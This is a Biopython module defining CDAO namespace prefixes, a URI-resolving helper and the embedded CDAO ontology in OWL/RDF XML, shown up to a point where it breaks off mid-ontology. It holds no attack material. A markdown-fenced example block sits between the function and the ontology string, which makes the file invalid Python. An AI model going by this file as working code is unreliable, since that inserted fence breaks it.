# Copyright (C) 2013 by Ben Morris (ben@bendmorris.com)
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
import xml.etree.ElementTree as ET
__docformat__ = "restructuredtext en"
cdao_namespaces = {
'cdao': 'http://purl.obolibrary.org/obo/cdao.owl#',
'obo': 'http://purl.obolibrary.org/obo/',
}
def resolve_uri(s, namespaces=cdao_namespaces, cdao_to_obo=True, xml_style=False):
    """Converts prefixed URIs to full URIs.

    Optionally, converts CDAO named identifiers to OBO numeric identifiers.
    """
    if cdao_to_obo and s.startswith('cdao:'):
        return resolve_uri('obo:%s' % cdao_elements[s[5:]], namespaces, cdao_to_obo)
    for prefix in namespaces:
        if xml_style:
            s = s.replace(prefix + ':', '{%s}' % namespaces[prefix])
        else:
            s = s.replace(prefix + ':', namespaces[prefix])
    return s
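# Example: a minimal, self-contained sketch of the prefix expansion that
# resolve_uri performs. The helper name `expand` is hypothetical (not part of
# this module), and the CDAO-name-to-OBO-id step is omitted because it depends
# on the cdao_elements mapping defined elsewhere in this file.

```python
namespaces = {
    'cdao': 'http://purl.obolibrary.org/obo/cdao.owl#',
    'obo': 'http://purl.obolibrary.org/obo/',
}

def expand(s, xml_style=False):
    # Replace each known prefix with its full namespace URI; with
    # xml_style=True, produce ElementTree's '{namespace}localname' form.
    for prefix, uri in namespaces.items():
        s = s.replace(prefix + ':', '{%s}' % uri if xml_style else uri)
    return s

print(expand('obo:CDAO_0000140'))                  # http://purl.obolibrary.org/obo/CDAO_0000140
print(expand('obo:CDAO_0000140', xml_style=True))  # {http://purl.obolibrary.org/obo/}CDAO_0000140
```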
cdao_owl = '''<?xml version="1.0"?>
<!DOCTYPE rdf:RDF [
<!ENTITY owl "http://www.w3.org/2002/07/owl#" >
<!ENTITY obo "http://purl.obolibrary.org/obo/" >
<!ENTITY dc "http://purl.org/dc/elements/1.1/" >
<!ENTITY xsd "http://www.w3.org/2001/XMLSchema#" >
<!ENTITY rdfs "http://www.w3.org/2000/01/rdf-schema#" >
<!ENTITY rdf "http://www.w3.org/1999/02/22-rdf-syntax-ns#" >
]>
<rdf:RDF xmlns="http://www.evolutionaryontology.org/cdao/1.0/cdao.owl#"
xml:base="http://www.evolutionaryontology.org/cdao/1.0/cdao.owl"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:obo="http://purl.obolibrary.org/obo/"
xmlns:rdfs="http://www.w3.org/2000/01/rdf-schema#"
xmlns:owl="http://www.w3.org/2002/07/owl#"
xmlns:xsd="http://www.w3.org/2001/XMLSchema#"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<owl:Ontology rdf:about="&obo;cdao.owl">
<dc:coverage rdf:datatype="&xsd;string">Comparison of two or more biological entities of the same class when the similarities and differences of the entities are treated explicitly as the product of an evolutionary process of descent with modification.</dc:coverage>
<dc:description rdf:datatype="&xsd;string">The Comparative Data Analysis Ontology (CDAO) provides a framework for understanding data in the context of evolutionary-comparative analysis. This comparative approach is used commonly in bioinformatics and other areas of biology to draw inferences from a comparison of differently evolved versions of something, such as differently evolved versions of a protein. In this kind of analysis, the things-to-be-compared typically are classes called 'OTUs' (Operational Taxonomic Units). The OTUs can represent biological species, but also may be drawn from higher or lower in a biological hierarchy, anywhere from molecules to communities. The features to be compared among OTUs are rendered in an entity-attribute-value model sometimes referred to as the 'character-state data model'. For a given character, such as 'beak length', each OTU has a state, such as 'short' or 'long'. The differences between states are understood to emerge by a historical process of evolutionary transitions in state, represented by a model (or rules) of transitions along with a phylogenetic tree. CDAO provides the framework for representing OTUs, trees, transformations, and characters. The representation of characters and transformations may depend on imported ontologies for a specific type of character.</dc:description>
<dc:creator xml:lang="en">CDAO Team</dc:creator>
<dc:title xml:lang="en">Comparative Data Analysis Ontology</dc:title>
<dc:subject xml:lang="en">comparative analysis; comparative data analysis; evolutionary comparative analysis; evolution; phylogeny; phylogenetics</dc:subject>
<dc:rights rdf:resource="http://creativecommons.org/publicdomain/zero/1.0/"/>
<owl:versionIRI rdf:resource="&obo;cdao/2012-06-06/cdao.owl"/>
<owl:imports rdf:resource="&obo;iao/ontology-metadata.owl"/>
</owl:Ontology>
<!--
///////////////////////////////////////////////////////////////////////////////////////
//
// Annotation properties
//
///////////////////////////////////////////////////////////////////////////////////////
-->
<owl:AnnotationProperty rdf:about="&dc;creator"/>
<owl:AnnotationProperty rdf:about="&dc;subject"/>
<owl:AnnotationProperty rdf:about="&dc;description"/>
<owl:AnnotationProperty rdf:about="&dc;coverage"/>
<owl:AnnotationProperty rdf:about="&dc;language"/>
<owl:AnnotationProperty rdf:about="&dc;identifier"/>
<owl:AnnotationProperty rdf:about="&dc;date"/>
<owl:AnnotationProperty rdf:about="&dc;source"/>
<owl:AnnotationProperty rdf:about="&dc;title"/>
<owl:AnnotationProperty rdf:about="&dc;rights"/>
<!--
///////////////////////////////////////////////////////////////////////////////////////
//
// Object Properties
//
///////////////////////////////////////////////////////////////////////////////////////
-->
<!-- http://purl.obolibrary.org/obo/CDAO_0000142 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000142">
<rdfs:label rdf:datatype="&xsd;string">has_Character</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property associates a character data matrix with a character (a column) represented in the matrix.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000056"/>
<rdfs:range rdf:resource="&obo;CDAO_0000071"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000143 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000143">
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Edge_as_Child</rdfs:label>
<dc:description>The property links a Node to the Edge it belongs to in the child position.</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000139"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000146"/>
<owl:inverseOf rdf:resource="&obo;CDAO_0000209"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000144 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000144">
<rdf:type rdf:resource="&owl;TransitiveProperty"/>
<rdfs:label rdf:datatype="&xsd;string">has_Ancestor</rdfs:label>
<dc:description>The property links a node to any of the other nodes that are its ancestors in a rooted tree.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000140"/>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<owl:inverseOf rdf:resource="&obo;CDAO_0000174"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000145 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000145">
<rdfs:label rdf:datatype="&xsd;string">has_Nucleotide_State</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property associates a nucleotide character-state instance with a state value from the domain of nucleotide states.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000002"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000184"/>
<rdfs:range>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000015"/>
<rdf:Description rdf:about="&obo;CDAO_0000133"/>
</owl:unionOf>
</owl:Class>
</rdfs:range>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000146 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000146">
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Edge</rdfs:label>
<dc:description>The property links a Node to one of the edges that are incident on such node.</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000099"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000190"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000147 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000147">
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Character_State_Data_Matrix</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000056"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000190"/>
<rdfs:domain>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000071"/>
<rdf:Description rdf:about="&obo;CDAO_0000138"/>
</owl:unionOf>
</owl:Class>
</rdfs:domain>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000148 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000148">
<rdf:type rdf:resource="&owl;FunctionalProperty"/>
<rdfs:label rdf:datatype="&xsd;string">has_Root</rdfs:label>
<dc:description>The property links a rooted tree to the specific node that represents the unique root of the tree.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000012"/>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000149 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000149">
<rdfs:label rdf:datatype="&xsd;string">has_Child</rdfs:label>
<dc:description>The property links a node to a node that is an immediate descendant in the tree.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000140"/>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000174"/>
<owl:inverseOf rdf:resource="&obo;CDAO_0000179"/>
<owl:propertyChainAxiom rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000177"/>
<rdf:Description rdf:about="&obo;CDAO_0000209"/>
</owl:propertyChainAxiom>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000150 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000150">
<rdfs:label rdf:datatype="&xsd;string">has_First_Coordinate_Item</rdfs:label>
<dc:description rdf:datatype="&xsd;string">The property that relates a coordinate list to the first item in the list.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000092"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
<rdfs:range>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000003"/>
<rdf:Description rdf:about="&obo;CDAO_0000095"/>
</owl:unionOf>
</owl:Class>
</rdfs:range>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000151 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000151">
<rdfs:label rdf:datatype="&xsd;string">has_Coordinate</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000022"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000098"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000152 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000152">
<rdf:type rdf:resource="&owl;FunctionalProperty"/>
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Continuous_Character</rdfs:label>
<rdfs:domain rdf:resource="&obo;CDAO_0000019"/>
<rdfs:range rdf:resource="&obo;CDAO_0000068"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000205"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000153 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000153">
<rdfs:label rdf:datatype="&xsd;string">has_Datum</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a character to a state datum for the character.</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000098"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
<rdfs:domain>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000071"/>
<rdf:Description rdf:about="&obo;CDAO_0000138"/>
</owl:unionOf>
</owl:Class>
</rdfs:domain>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000154 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000154">
<rdfs:label rdf:datatype="&xsd;string">has_Standard_Datum</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000008"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000183"/>
<rdfs:domain>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000075"/>
<rdf:Description rdf:about="&obo;CDAO_0000138"/>
</owl:unionOf>
</owl:Class>
</rdfs:domain>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000155 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000155">
<rdfs:label rdf:datatype="&xsd;string">subtree_of</rdfs:label>
<dc:description>This property links two networks where the latter is a substructure of the former.</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000006"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000006"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000156 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000156">
<rdfs:label rdf:datatype="&xsd;string">has_Amino_Acid_State</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property associates an amino acid character-state instance with a state value from the domain of amino acid states.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000112"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000184"/>
<rdfs:range>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000015"/>
<rdf:Description rdf:about="&obo;CDAO_0000076"/>
</owl:unionOf>
</owl:Class>
</rdfs:range>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000157 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000157">
<rdfs:label rdf:datatype="&xsd;string">is_annotation_of</rdfs:label>
<rdfs:domain rdf:resource="&obo;CDAO_0000040"/>
<rdfs:range rdf:resource="&owl;Thing"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000158 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000158">
<rdfs:label rdf:datatype="&xsd;string">has_RNA_Datum</rdfs:label>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000206"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000159 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000159">
<rdfs:label rdf:datatype="&xsd;string">has_Left_State</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a transformation to a 'left' state (the state associated with the 'left' node).</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000091"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000097"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000182"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000160 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000160">
<rdfs:label rdf:datatype="&xsd;string">precedes</rdfs:label>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000161 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000161">
<rdfs:label rdf:datatype="&xsd;string">exclude</rdfs:label>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000162 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000162">
<rdfs:label rdf:datatype="&xsd;string">has_Node</rdfs:label>
<dc:description>Property that associates to each Edge the Nodes it connects.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000099"/>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000163 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000163">
<rdfs:label rdf:datatype="&xsd;string">nca_node_of</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000059"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000140"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000164 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000164">
<rdfs:label rdf:datatype="&xsd;string">has_External_Reference</rdfs:label>
<rdfs:comment rdf:datatype="&rdfs;Literal">Associates a TU to some external taxonomy reference.</rdfs:comment>
<rdfs:domain rdf:resource="&obo;CDAO_0000138"/>
<rdfs:range rdf:resource="&owl;Thing"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000165 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000165">
<rdfs:label rdf:datatype="&xsd;string">has_Coordinate_System</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property links a coordinate to the coordinate system it references.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000022"/>
<rdfs:range rdf:resource="&obo;CDAO_0000104"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000166 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000166">
<rdf:type rdf:resource="&owl;FunctionalProperty"/>
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Nucleotide_Character</rdfs:label>
<rdfs:domain rdf:resource="&obo;CDAO_0000002"/>
<rdfs:range rdf:resource="&obo;CDAO_0000094"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000205"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000167 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000167">
<rdf:type rdf:resource="&owl;SymmetricProperty"/>
<rdfs:label rdf:datatype="&xsd;string">connects_to</rdfs:label>
<owl:inverseOf rdf:resource="&obo;CDAO_0000167"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000168 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000168">
<rdfs:label rdf:datatype="&xsd;string">has_Amino_Acid_Datum</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates an amino acid character (a column in a protein sequence alignment) to a state datum for the character (an individual cell in the alignment column).</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000112"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000206"/>
<rdfs:domain>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000131"/>
<rdf:Description rdf:about="&obo;CDAO_0000138"/>
</owl:unionOf>
</owl:Class>
</rdfs:domain>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000169 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000169">
<rdfs:label rdf:datatype="&xsd;string">hereditary_change_of</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a type of evolutionary change (an Edge_Transformation) to the character that undergoes the change. The change is a transformation_of the affected character.</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000071"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000170 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000170">
<rdfs:label rdf:datatype="&xsd;string">has_Compound_Datum</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a compound character (a character with some states that are subdividable) to a state datum for the character.</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000136"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000183"/>
<rdfs:domain>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000078"/>
<rdf:Description rdf:about="&obo;CDAO_0000138"/>
</owl:unionOf>
</owl:Class>
</rdfs:domain>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000171 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000171">
<rdfs:label rdf:datatype="&xsd;string">has_Descendants</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000059"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000080"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000172 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000172">
<rdfs:label rdf:datatype="&xsd;string">reconciliation_of</rdfs:label>
<rdfs:domain rdf:resource="&obo;CDAO_0000030"/>
<rdfs:range rdf:resource="&obo;CDAO_0000110"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000173 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000173">
<rdf:type rdf:resource="&owl;FunctionalProperty"/>
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Amino_Acid_Character</rdfs:label>
<rdfs:domain rdf:resource="&obo;CDAO_0000112"/>
<rdfs:range rdf:resource="&obo;CDAO_0000131"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000205"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000174 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000174">
<rdf:type rdf:resource="&owl;TransitiveProperty"/>
<rdfs:label rdf:datatype="&xsd;string">has_Descendant</rdfs:label>
<dc:description>A property that links a node to any of its descendants in a rooted tree.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000140"/>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000175 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000175">
<rdfs:label rdf:datatype="&xsd;string">has_Continuous_State</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property associates a character-state instance with a state value on a continuous numeric scale.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000019"/>
<rdfs:range rdf:resource="&obo;CDAO_0000031"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000184"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000176 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000176">
<rdfs:label rdf:datatype="&xsd;string">has_Type</rdfs:label>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000177 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000177">
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Edge_as_Parent</rdfs:label>
<dc:description>The property links a Node to one of the Edges where the node appears in the parent position (i.e., closer to the root).</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000139"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000146"/>
<owl:inverseOf rdf:resource="&obo;CDAO_0000201"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000178 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000178">
<rdfs:label rdf:datatype="&xsd;string">has</rdfs:label>
<dc:description>Generic 'has' property.</dc:description>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000179 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000179">
<rdfs:label rdf:datatype="&xsd;string">has_Parent</rdfs:label>
<dc:description>The property that links a node to its unique parent in a rooted tree.</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000144"/>
<owl:propertyChainAxiom rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000143"/>
<rdf:Description rdf:about="&obo;CDAO_0000201"/>
</owl:propertyChainAxiom>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000180 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000180">
<rdfs:label rdf:datatype="&xsd;string">belongs_to_Compound_Character</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000078"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000136"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000205"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000181 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000181">
<rdfs:label rdf:datatype="&xsd;string">homologous_to</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates different instances of the same character, including the case when the states of the character differ (e.g., large_beak of beak_size_character of TU A is homologous_to small_beak of beak_size_character of TU B).</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000098"/>
<rdfs:range rdf:resource="&obo;CDAO_0000098"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000182 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000182">
<rdfs:label rdf:datatype="&xsd;string">has_Change_Component</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a transformation to the components that compose it.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000097"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000183 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000183">
<rdfs:label rdf:datatype="&xsd;string">has_Categorical_Datum</rdfs:label>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000153"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000184 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000184">
<rdfs:label rdf:datatype="&xsd;string">has_State</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property associates a character-state instance with its state value, e.g., a state value expressed in terms of an imported domain ontology.</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000091"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000098"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000178"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000185 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000185">
<rdfs:label rdf:datatype="&xsd;string">has_Left_Node</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a transformation to a 'left' node (the node that has the 'left' state).</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000097"/>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000182"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000186 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000186">
<rdfs:label rdf:datatype="&xsd;string">has_Right_State</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a transformation to a 'right' state (the state associated with the 'right' node).</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000091"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000097"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000182"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000187 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000187">
<rdf:type rdf:resource="&owl;FunctionalProperty"/>
<rdfs:label rdf:datatype="&xsd;string">represents_TU</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a TU or taxonomic unit (typically associated with character data) to a phylogenetic history (Tree).</dc:description>
<rdfs:range rdf:resource="&obo;CDAO_0000138"/>
<rdfs:domain rdf:resource="&obo;CDAO_0000140"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000188 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000188">
<rdfs:label rdf:datatype="&xsd;string">exclude_Node</rdfs:label>
<rdfs:range rdf:resource="&obo;CDAO_0000140"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000161"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000189 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000189">
<rdfs:label rdf:datatype="&xsd;string">has_Compound_State</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property associates a compound character-state instance with its compound state value.</dc:description>
<rdfs:domain rdf:resource="&obo;CDAO_0000136"/>
<rdfs:subPropertyOf rdf:resource="&obo;CDAO_0000184"/>
<rdfs:range>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000015"/>
<rdf:Description rdf:about="&obo;CDAO_0000055"/>
</owl:unionOf>
</owl:Class>
</rdfs:range>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000190 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000190">
<rdfs:label rdf:datatype="&xsd;string">belongs_to</rdfs:label>
<dc:description>Generic property that links a concept to another concept it is a constituent of. The property is a synonym of part_of.</dc:description>
<owl:equivalentProperty rdf:resource="&obo;CDAO_0000194"/>
<rdfs:range rdf:resource="&owl;Thing"/>
<rdfs:domain rdf:resource="&owl;Thing"/>
</owl:ObjectProperty>
<!-- http://purl.obolibrary.org/obo/CDAO_0000191 -->
<owl:ObjectProperty rdf:about="&obo;CDAO_0000191">
<rdf:type rdf:resource="&owl;FunctionalProperty"/>
<rdfs:label rdf:datatype="&xsd;string">belongs_to_TU</rdfs:label>
<dc:description rdf:datatype="&xsd;string">This property relates a character-state datum to its TU.</dc:description>
